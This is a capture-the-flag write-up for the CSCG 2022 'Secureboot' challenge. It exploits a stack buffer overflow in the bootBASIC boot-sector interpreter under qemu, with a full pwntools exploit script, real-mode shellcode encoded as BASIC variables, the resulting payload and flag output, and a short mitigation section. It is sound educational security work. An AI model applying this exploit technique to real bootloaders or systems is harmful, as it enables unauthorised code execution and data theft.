CSCG: Secureboot

This is my second writeup for the Cybersecurity Challenge Germany (CSCG) in 2022.

Category: Pwn

Flag: CSCG{cyber_cyber_hax_hax!11!!1}

Writeup

There are two versions of the bootloader, one with a test key and one with a production key. This challenge has three stages,

first you need to obtain the test bootloader image

then you have to reverse engineer it and sign your own image with the test key

at the end you have to sign the image with the production key to prove that you are l33t

The flag for each stage in on an attached drive. Details on the deployment can be found in the Dockerfile.

Example input:

[…]

I have also test-signed 4 programs. Tetros is from https://github.com/daniel-e/tetros and the other three are from https://github.com/nanochess.

Btw. the sha256sum of the test bootloader image is: […].

Exploring the Challenge

The first task of the challenge was to figure out what to do. We are looking at a challenge made of three parts. Since we want to solve the first part, the description tells us to obtain the test bootloader image.

Downloading the challenge files, we get a script called server.py as well as a Dockerfile. The script sets up a server that asks a few questions and sets up qemu [1] to which it then redirects stdin, stdout and stderr. It gives qemu three drives:

A bootloader, either bootloader_test or bootloader_prod (this is the boot medium)
520 bytes (512 bytes Master Boot Record + 8 bytes signature) that we can put in
Flag

For this part of the challenge, the emulator boots the test bootloader. This bootloader verifies our bootloader signature and gives control to our bootloader. Our task is to take one of the four test-signed bootloaders and dump bootloader_test as well as the flag. To not make this task unnecessarily hard, we need to choose our bootloader wisely. We have the following options:

Tetros [1]. This bootloader lets a user play tetris.
Lights [2]: This bootloader lets a user play lights, a game where the computer plays a sequence and the player has to remember the sequence, while the sequence gets longer every turn.
Fbird [3]: This bootloader lets a user play flappy bird.
bootBASIC [4]. This bootloader contains a basic interpreter.

After looking at all the bootloaders available, I concluded that the bootBASIC image can probably exploited best since it contains lots of string handling code, variables and needs to store the code that corresponds to every line number (like 5 print "Hello World").

Overwriting the Return Address

Inspecting the source code, we find that the interpreter performs almost no bounds checks (it needs to fit into 510 bytes!). The stack is at address 0xff00 while the program is stored at 0x8000. Therefore, we can in theory overwrite a return address on the stack to execute our own code.

My first attempt to overwrite the return address was to put in a very long line of text, approximately 0x7f00 chars. Since qemu drops keypresses when typing too fast and the server has a 10-minute timeout, I could not overwrite the stack in time. Therefore, I needed to find a smarter way to overwrite the stack.

Luckily, bootBASIC stores each line of the BASIC program at a certain offset from 0x8000, so entering 5 print "Hello World" will store print "Hello World" at address 0x8000+5*20. Using gdb, I determined the return address of the input_line call to be stored between 0xfef6 and 0xff00. Using a line like 1625 <addr><addr><addr>...<addr> we can overwrite the return address.

Which characters does the bootloader accept?

We need to make sure that the two characters corresponding to the little-endian representation of the return address are actually saved in memory when typed in via qemu. To find out which characters are accepted by qemu, I wrote a small script that types in every character. Using gdb, I read out the memory of the machine to see which characters are actually stored:

from pwn import *

if __name__ == '__main__':
    p = process(['qemu-system-i386', '-drive', 'format=raw,file=basic_no_sig', '-nographic', '-s', '-S'])
    for i in range(256):
        if i == 0x0d:
            continue
        p.send(i.to_bytes(1, 'little'))
        print(p.read())
    p.interactive()

We skip \r since this causes a newline which overwrites the start of the buffer. This is the memory of the bootloader after executing the script:

We see that 0x0, 0x1, 0x2, 0x8 and 0xd cannot be used (0xd is the backspace character). Also, we can only use ASCII characters.

Shellcode

Since the bootloader is running in real mode with all segment registers set to 0, all data is executable. Therefore, we can write shellcode to memory and execute it. The easiest way for me was to use the bootBASIC variable feature: It allows storing 26 16-bit unsigned integers, each variable corresponding to a letter in the alphabet. The plan is to encode the shellcode into variable assignments and jump to the address of the first variable used. Because of the address limitation we discovered above, the first letter I used was ‘h’. We have to jump to address 0x7e10, corresponding to '\x10~' which is stored as-is in memory.

The shellcode contains the code necessary to dump the first sector of a hard drive. It uses int 0x13 to read the first sector of the hard drive and then calls the function output_number from bootBASIC for each byte:

org 0x7e10
    mov ax,0x0201 ; read 1 sector
    mov bx,0x8000 ; buffer address
    mov cx,0x1 ; from cylinder number 0, one sector
    mov dx,{drive_number} ; drive {drive_number}, head 0
    int 0x13
    mov si,0x8000
loop_iter:
    xor ax, ax
    mov al,[si]
    call 0x7c00 + 0x11c ; output_number
    mov al,' '
    call 0x7c00 + 0x1a7 ; output
    inc si
    cmp si, 0x8200 ; read 512 bytes
    jne loop_iter
loop_end:
    jmp loop_end

In our script, we replace drive_number with the BIOS drive number, so 0x80 for the bootloader and 0x81 for the flag.

We assemble the shellcode and encode it into variables, so the payload for drive 0x82 looks like this:

b'h=440\ri=47874\rj=32768\rk=441\rl=47616\rm=130\rn=5069\ro~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\r'

We get the following output:

$ python solve1.py
[+] Opening connection to 288d6d81b8db6f3e4f732be0-secureboot.challenge.master.cscg.live on port 31337: Done
b'h=440\ri=47874\rj=32768\rk=441\rl=47616\rm=130\rn=5069\ro=190\rp=12672\rq=35520\rr=59396\rs=65268\rt=8368\ru=31464\rv=18175\rw=65153\rx=33280\ry=60789\rz=65259\r1625  \x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\x10~\r'
[*] CSCG{cyber_cyber_hax_hax!11!!1}
[*] Closed connection to 288d6d81b8db6f3e4f732be0-secureboot.challenge.master.cscg.live port 31337

We get the flag CSCG{cyber_cyber_hax_hax!11!!1}. Using drive number 0x80, we also get the bootloader with checksum specified in the challenge. Final script:

from pwn import *
import subprocess

def get_shellcode(drive_number):
    asm = f'''
org 0x7e10
    mov ax,0x0201 ; read 1 sector
    mov bx,0x8000 ; buffer address
    mov cx,0x1 ; from cylinder number 0, one sector
    mov dx,{drive_number} ; drive {drive_number}, head 0
    int 0x13
    mov si,0x8000
loop_iter:
    xor ax, ax
    mov al,[si]
    call 0x7c00 + 0x11c ; output_number
    mov al,' '
    call 0x7c00 + 0x1a7 ; output
    inc si
    cmp si, 0x8200 ; read 512 bytes
    jne loop_iter
loop_end:
    jmp loop_end
    '''

    with open('payload.asm', 'w') as f:
        f.write(asm)
    subprocess.run(['nasm', 'payload.asm'])

    with open('payload', 'rb') as f:
        payload_data = f.read()

    os.unlink('payload.asm')
    os.unlink('payload')
    return payload_data


def encode_shellcode(shellcode):
    """
    encode our shellcode as variables, starting at 'h'. every variable can hold 16 bits.
    """
    i = 0
    res = ''
    while i < len(shellcode):
        number = int.from_bytes(shellcode[i:i+2], 'little')
        i += 2
        res += chr(ord('h')+(i//2-1))+'='+str(number)+"\r"
    return res

def exploit_basic(p, drive_number=0x80):
    payload = encode_shellcode(get_shellcode(drive_number)).encode()
    payload += b"1625  " + p16(0x7e10) * 20 + b"\r" # two spaces for alignment, offset for 'h' as first variable
    print(payload)

    p.recvuntil(b'>')
    for i,byte in enumerate(payload):
        p.send(byte.to_bytes(1, 'little'))
        p.read()
    p.recvuntil(b'\n')

    i = 0
    data = []
    for i in range(512):
        data.append(int(p.recvuntil(b' ').strip().replace(b'\r\r\n', b'').decode()))

    return b''.join(elem.to_bytes(1, 'little') for elem in data)

def setup_challenge(p, second_stage, prod=False, nographic=True):
    p.send((b'1' if prod else b'0') + b'\n' + (b'1' if nographic else b'0') + b'\n')
    p.sendline(second_stage.hex().encode() + b'EOF')

if __name__ == '__main__':
    local = False
    if local:
        p = process(['qemu-system-i386', '-drive', 'format=raw,file=basic_no_sig', '-drive', 'format=raw,file=test.txt', '-nographic'])
    else:
        p = remote('288d6d81b8db6f3e4f732be0-secureboot.challenge.master.cscg.live', 31337, ssl=True)
    with open('testsigned_images/basic-test_signed', 'rb') as f:
        data = f.read()
    setup_challenge(p, data, prod=False, nographic=True)
    data = exploit_basic(p, drive_number=0x82)
    log.info(data.rstrip('\x00'))
    with open('dumped.bin', 'wb') as f:
        f.write(data)

Mitigation

Our attack vector was the missing bounds checks in the bootloader which allowed us to overwrite the return address on the stack. Because the data and code segments are not separated, we were able to execute shellcode.

As always with binary exploitation challenges, the primary migitation is to check bounds before all operations to avoid buffer overflows. This is even more important in kernel modules and bootloaders as code runs with higher privileges there. A partial mitigation would also be to separate code and data segments which would increase the difficulty of exploitation.

Sources

[1] https://github.com/daniel-e/tetros

[2] https://github.com/nanochess/lights

[3] https://github.com/nanochess/fbird

[4] https://github.com/nanochess/bootBASIC